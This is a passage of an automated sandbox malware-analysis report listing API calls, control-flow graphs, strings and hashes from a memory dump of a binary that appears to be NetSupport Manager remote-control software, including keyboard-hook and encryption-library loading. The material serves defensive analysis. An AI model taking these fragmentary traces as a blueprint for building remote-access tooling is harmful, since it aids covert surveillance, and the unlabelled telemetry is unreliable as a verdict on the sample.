                                                                                  • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                  • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                  • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                  • _memset.LIBCMT ref: 111415F9
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                  • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                  • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                  • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                  • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                  • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                  • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                  • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                    • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AD96CFBE,1102FCB2,00000000), ref: 1101747E
                                                                                    • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                    • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                    • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                    • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                    • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                  • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                  • API String ID: 3706574701-3145203681
                                                                                  • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                  • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                  • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                  • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2308 110285f0-1102860d 2309 11028613-11028642 2308->2309 2310 11028cd8-11028cdf 2308->2310 2311 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2309->2311 2312 11028648-1102864e 2309->2312 2313 11028cf1-11028cf5 2310->2313 2314 11028ce1-11028cea 2310->2314 2328 1102871d 2311->2328 2316 11028650-11028658 2312->2316 2318 11028cf7-11028d09 call 11161d01 2313->2318 2319 11028d0a-11028d1e call 11161d01 2313->2319 2314->2313 2317 11028cec 2314->2317 2316->2316 2321 1102865a-11028660 2316->2321 2317->2313 2325 11028663-11028668 2321->2325 2325->2325 2329 1102866a-11028674 2325->2329 2330 11028720-1102872a 2328->2330 2331 11028691-11028697 2329->2331 2332 11028676-1102867d 2329->2332 2333 11028730-11028733 2330->2333 2334 11028ccf-11028cd7 2330->2334 2336 11028698-1102869e 2331->2336 2335 11028680-11028686 2332->2335 2333->2334 2337 11028739-11028747 call 11026890 2333->2337 2334->2310 2335->2335 2338 11028688-1102868e 2335->2338 2336->2336 2339 110286a0-110286ce call 11163fed 2336->2339 2344 11028c55-11028c6a call 11163db7 2337->2344 2345 1102874d-11028760 call 11162de7 2337->2345 2338->2331 2339->2330 2344->2334 2350 11028c70-11028cca 2344->2350 2351 11028762-11028765 2345->2351 2352 1102876b-11028793 call 11026700 call 11026890 2345->2352 2350->2334 2351->2344 2351->2352 2352->2344 2357 11028799-110287b6 call 11026980 call 11026890 2352->2357 2362 11028bc5-11028bcc 2357->2362 2363 110287bc 2357->2363 2364 11028bf2-11028bf9 2362->2364 2365 11028bce-11028bd1 2362->2365 2366 110287c0-110287e0 call 11026700 2363->2366 2368 11028c11-11028c18 2364->2368 2369 11028bfb-11028c01 2364->2369 2365->2364 2367 11028bd3-11028bda 2365->2367 2376 110287e2-110287e5 2366->2376 2377 11028816-11028819 2366->2377 2371 11028be0-11028bf0 2367->2371 2373 11028c1a-11028c25 2368->2373 2374 11028c28-11028c2f 2368->2374 2372 11028c07-11028c0f 2369->2372 2371->2364 2371->2371 2372->2368 2372->2372 2373->2374 2378 11028c31-11028c3b 2374->2378 2379 11028c3e-11028c45 2374->2379 2382 110287e7-110287ee 2376->2382 2383 110287fe-11028801 2376->2383 2380 11028bae-11028bbf call 11026890 2377->2380 2381 1102881f-11028832 call 11164150 2377->2381 2378->2379 2379->2344 2384 11028c47-11028c52 2379->2384 2380->2362 2380->2366 2381->2380 2391 11028838-11028854 call 111646ce 2381->2391 2387 110287f4-110287fc 2382->2387 2383->2380 2388 11028807-11028811 2383->2388 2384->2344 2387->2383 2387->2387 2388->2380 2394 11028856-1102885c 2391->2394 2395 1102886f-11028885 call 111646ce 2391->2395 2396 11028860-11028868 2394->2396 2400 11028887-1102888d 2395->2400 2401 1102889f-110288b5 call 111646ce 2395->2401 2396->2396 2398 1102886a 2396->2398 2398->2380 2403 11028890-11028898 2400->2403 2406 110288b7-110288bd 2401->2406 2407 110288cf-110288e5 call 111646ce 2401->2407 2403->2403 2405 1102889a 2403->2405 2405->2380 2408 110288c0-110288c8 2406->2408 2412 110288e7-110288ed 2407->2412 2413 110288ff-11028915 call 111646ce 2407->2413 2408->2408 2410 110288ca 2408->2410 2410->2380 2414 110288f0-110288f8 2412->2414 2418 11028917-1102891d 2413->2418 2419 1102892f-11028945 call 111646ce 2413->2419 2414->2414 2416 110288fa 2414->2416 2416->2380 2420 11028920-11028928 2418->2420 2424 11028947-1102894d 2419->2424 2425 1102895f-11028975 call 111646ce 2419->2425 2420->2420 2422 1102892a 2420->2422 2422->2380 2426 11028950-11028958 2424->2426 2430 11028977-1102897d 2425->2430 2431 1102898f-110289a5 call 111646ce 2425->2431 2426->2426 2428 1102895a 2426->2428 2428->2380 2432 11028980-11028988 2430->2432 2436 110289a7-110289ad 2431->2436 2437 110289bf-110289d5 call 111646ce 2431->2437 2432->2432 2435 1102898a 2432->2435 2435->2380 2438 110289b0-110289b8 2436->2438 2442 110289d7-110289dd 2437->2442 2443 110289ef-11028a05 call 111646ce 2437->2443 2438->2438 2440 110289ba 2438->2440 2440->2380 2444 110289e0-110289e8 2442->2444 2448 11028a07-11028a0d 2443->2448 2449 11028a1f-11028a35 call 111646ce 2443->2449 2444->2444 2446 110289ea 2444->2446 2446->2380 2451 11028a10-11028a18 2448->2451 2454 11028a37-11028a3d 2449->2454 2455 11028a4f-11028a65 call 111646ce 2449->2455 2451->2451 2453 11028a1a 2451->2453 2453->2380 2456 11028a40-11028a48 2454->2456 2460 11028a86-11028a9c call 111646ce 2455->2460 2461 11028a67-11028a6d 2455->2461 2456->2456 2458 11028a4a 2456->2458 2458->2380 2466 11028ab3-11028ac9 call 111646ce 2460->2466 2467 11028a9e 2460->2467 2462 11028a77-11028a7f 2461->2462 2462->2462 2464 11028a81 2462->2464 2464->2380 2472 11028ae0-11028af6 call 111646ce 2466->2472 2473 11028acb 2466->2473 2468 11028aa4-11028aac 2467->2468 2468->2468 2470 11028aae 2468->2470 2470->2380 2478 11028b17-11028b2d call 111646ce 2472->2478 2479 11028af8-11028afe 2472->2479 2474 11028ad1-11028ad9 2473->2474 2474->2474 2476 11028adb 2474->2476 2476->2380 2484 11028b4f-11028b65 call 111646ce 2478->2484 2485 11028b2f-11028b3f 2478->2485 2480 11028b08-11028b10 2479->2480 2480->2480 2483 11028b12 2480->2483 2483->2380 2490 11028b67-11028b6d 2484->2490 2491 11028b7c-11028b92 call 111646ce 2484->2491 2486 11028b40-11028b48 2485->2486 2486->2486 2488 11028b4a 2486->2488 2488->2380 2492 11028b70-11028b78 2490->2492 2491->2380 2496 11028b94-11028b9a 2491->2496 2492->2492 2494 11028b7a 2492->2494 2494->2380 2497 11028ba4-11028bac 2496->2497 2497->2380 2497->2497
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74601370,?,0000001A), ref: 110286DD
                                                                                  • _strrchr.LIBCMT ref: 110286EC
                                                                                    • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileModuleName__stricmp_l_strrchr
                                                                                  • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                  • API String ID: 1609618855-357498123
                                                                                  • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                  • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                  • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                  • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2498 11086700-1108671d call 110866f0 2501 1108671f-1108672f call 11161d01 2498->2501 2502 11086730-11086740 call 11144bd0 2498->2502 2507 11086742-1108674a 2502->2507 2507->2507 2508 1108674c-11086752 2507->2508 2509 11086753-11086759 2508->2509 2509->2509 2510 1108675b-11086792 LoadLibraryA 2509->2510 2511 110867f9-1108680e GetProcAddress 2510->2511 2512 11086794-1108679b 2510->2512 2515 1108689c-110868ad call 11161d01 2511->2515 2516 11086814-11086823 GetProcAddress 2511->2516 2513 1108679d-110867ee GetModuleFileNameA call 11081b40 LoadLibraryA 2512->2513 2514 110867f0-110867f3 2512->2514 2513->2514 2514->2511 2514->2515 2516->2515 2519 11086825-11086834 GetProcAddress 2516->2519 2519->2515 2522 11086836-11086845 GetProcAddress 2519->2522 2522->2515 2523 11086847-11086856 GetProcAddress 2522->2523 2523->2515 2524 11086858-11086867 GetProcAddress 2523->2524 2524->2515 2525 11086869-11086878 GetProcAddress 2524->2525 2525->2515 2526 1108687a-11086889 GetProcAddress 2525->2526 2526->2515 2527 1108688b-1108689a GetProcAddress 2526->2527 2527->2515 2528 110868ae-110868c3 call 11161d01 2527->2528
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                  • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                  • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                  • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                  • API String ID: 2201880244-3035937465
                                                                                  • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                  • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                  • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                  • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2531 11141890-111418c6 2532 111418cf-111418e4 call 1110f420 2531->2532 2533 111418c8-111418ca 2531->2533 2539 111418e6-1114190e call 11060f70 2532->2539 2540 11141910-11141912 2532->2540 2534 111421f2-1114220d call 11161d01 2533->2534 2542 11141918-11141947 call 11061700 2539->2542 2540->2542 2547 11141950-1114195d call 11142e50 2542->2547 2548 11141949-1114194a RegCloseKey 2542->2548 2551 11141964-11141985 call 11144dc0 call 11143230 2547->2551 2552 1114195f 2547->2552 2548->2547 2557 11141997-111419ad call 1110f420 2551->2557 2558 11141987-11141992 call 11062d60 2551->2558 2552->2551 2562 111419c2 2557->2562 2563 111419af-111419c0 call 11060be0 2557->2563 2558->2557 2564 111419c8-111419e2 call 1110f420 2562->2564 2563->2564 2569 111419e4-111419f5 call 11060be0 2564->2569 2570 111419f7 2564->2570 2572 111419fd-11141a17 call 1110f420 2569->2572 2570->2572 2576 11141a2c 2572->2576 2577 11141a19-11141a2a call 11060be0 2572->2577 2578 11141a32-11141a79 call 11060760 * 2 2576->2578 2577->2578 2585 11141a80 2578->2585 2586 11141a87-11141a8e 2585->2586 2587 11141a90-11141a97 2586->2587 2588 11141a9d-11141aa5 2586->2588 2587->2588 2589 11141d9a 2587->2589 2590 11141aa7-11141aad 2588->2590 2591 11141ac9-11141ad0 2588->2591 2594 11141da0-11141da2 2589->2594 2590->2591 2595 11141aaf-11141abc call 110607f0 2590->2595 2592 11141af5-11141b03 2591->2592 2593 11141ad2-11141ad9 2591->2593 2599 11141b05-11141b07 2592->2599 2600 11141b0d-11141b0f 2592->2600 2593->2592 2596 11141adb-11141ae8 call 110607f0 2593->2596 2597 1114217f-11142187 2594->2597 2598 11141da8-11141df2 call 110d1550 call 1105dd10 2594->2598 2617 11141ac7 2595->2617 2618 11141abe-11141ac5 2595->2618 2619 11141af3 2596->2619 2620 11141aea-11141af1 2596->2620 2603 11142191-11142199 2597->2603 2604 11142189-1114218d 2597->2604 2648 11141f3d-11141f85 call 11060f40 call 1106b5c0 call 110679c0 2598->2648 2649 11141df8-11141e1f call 11060760 call 110607f0 2598->2649 2599->2589 2599->2600 2606 11141b11-11141b13 2600->2606 2607 11141b5d-11141b5f 2600->2607 2612 111421a3-111421ab 2603->2612 2613 1114219b-1114219f 2603->2613 2604->2603 2615 11141b15-11141b1b 2606->2615 2616 11141b2f-11141b31 2606->2616 2610 11141b61-11141b66 2607->2610 2611 11141b68-11141b6a 2607->2611 2621 11141b8b-11141ba5 call 11081bb0 2610->2621 2622 11141b73-11141b89 call 11081bb0 2611->2622 2623 11141b6c-11141b71 2611->2623 2624 111421b5-111421f0 call 11060640 * 2 call 111618c1 2612->2624 2625 111421ad-111421b1 2612->2625 2613->2612 2615->2616 2626 11141b1d-11141b2a call 11146450 2615->2626 2627 11141d85-11141d98 call 11146450 2616->2627 2628 11141b37-11141b3e 2616->2628 2617->2591 2618->2591 2619->2592 2620->2592 2644 11141cac-11141ce9 call 1105de00 call 111319f0 2621->2644 2645 11141bab 2621->2645 2622->2621 2623->2621 2624->2534 2625->2624 2626->2585 2627->2594 2628->2627 2629 11141b44-11141b58 call 11146450 2628->2629 2629->2586 2679 11141cf1-11141cf8 2644->2679 2680 11141ceb 2644->2680 2650 11141bb5 2645->2650 2651 11141bad-11141baf 2645->2651 2703 11141f87 2648->2703 2704 11141fb3-11141fe8 EnterCriticalSection call 11060420 call 11060f40 2648->2704 2683 11141e21-11141e50 call 11146450 call 110607f0 2649->2683 2684 11141e52-11141e7a call 11060760 call 110607f0 2649->2684 2653 11141c3e-11141c7b call 1105de00 call 111319f0 2650->2653 2654 11141bbb-11141bc1 2650->2654 2651->2644 2651->2650 2692 11141c83-11141c8a 2653->2692 2693 11141c7d 2653->2693 2661 11141bc7-11141bcb 2654->2661 2668 11141be7-11141be9 2661->2668 2669 11141bcd-11141bcf 2661->2669 2677 11141bec-11141bee 2668->2677 2675 11141bd1-11141bd7 2669->2675 2676 11141be3-11141be5 2669->2676 2675->2668 2686 11141bd9-11141be1 2675->2686 2676->2677 2687 11141bf0-11141c2a call 1105de00 call 111319f0 2677->2687 2688 11141c32-11141c39 2677->2688 2681 11141d0a 2679->2681 2682 11141cfa-11141d08 2679->2682 2680->2679 2690 11141d11 2681->2690 2682->2681 2682->2690 2683->2684 2723 11141eb1-11141ed8 call 11060760 call 110607f0 2684->2723 2724 11141e7c 2684->2724 2686->2661 2686->2676 2687->2688 2725 11141c2c 2687->2725 2688->2690 2697 11141d18-11141d1a 2690->2697 2699 11141c9c 2692->2699 2700 11141c8c-11141c9a 2692->2700 2693->2692 2705 11141d1c-11141d1e 2697->2705 2706 11141d3e-11141d56 call 11081c60 2697->2706 2709 11141ca3-11141caa 2699->2709 2700->2699 2700->2709 2712 11141f90-11141f9e call 110508e0 2703->2712 2737 11141ffa-1114200c LeaveCriticalSection 2704->2737 2738 11141fea-11141ff7 call 1102a9f0 2704->2738 2705->2706 2713 11141d20-11141d38 call 11081bb0 2705->2713 2730 11141d58 2706->2730 2731 11141d5b-11141d73 call 11081c60 2706->2731 2709->2697 2733 11141fa0-11141fa1 2712->2733 2734 11141fa3 2712->2734 2713->2586 2713->2706 2757 11141f11-11141f38 call 11060640 * 3 2723->2757 2758 11141eda 2723->2758 2732 11141e80-11141eaf call 11146450 call 110607f0 2724->2732 2725->2688 2730->2731 2754 11141d75-11141d78 2731->2754 2755 11141d7d-11141d80 2731->2755 2732->2723 2735 11141fa4-11141fb1 call 110679c0 2733->2735 2734->2735 2735->2704 2735->2712 2744 11142051-1114209e call 11133400 call 110d1550 call 110cff20 2737->2744 2745 1114200e-11142010 2737->2745 2738->2737 2782 111420a4-111420c1 call 110d12e0 2744->2782 2783 1114214c-11142179 call 110d07c0 call 1106b620 call 110d07c0 2744->2783 2745->2744 2753 11142012-11142034 call 11146450 call 1113cc30 call 111414a0 2745->2753 2753->2744 2781 11142036-1114204e call 11146450 call 11026ba0 2753->2781 2754->2586 2755->2586 2757->2648 2761 11141ee0-11141f0f call 11146450 call 110607f0 2758->2761 2761->2757 2781->2744 2795 111420c3-111420d7 call 11029450 2782->2795 2796 111420da-111420f0 call 11081bb0 2782->2796 2783->2597 2795->2796 2803 111420f2-1114210a call 11009450 call 11081a70 2796->2803 2804 1114212b-11142145 2796->2804 2803->2804 2811 1114210c-11142129 call 11009450 2803->2811 2809 1114214a 2804->2809 2809->2783 2811->2809
                                                                                  APIs
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 3535843008-2062829784
                                                                                  • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                  • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                  • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                  • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                  • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                  • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                  • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                  • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                  • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                  • _strncpy.LIBCMT ref: 11074B68
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                  • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                  • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                  • std::exception::exception.LIBCMT ref: 11074D68
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
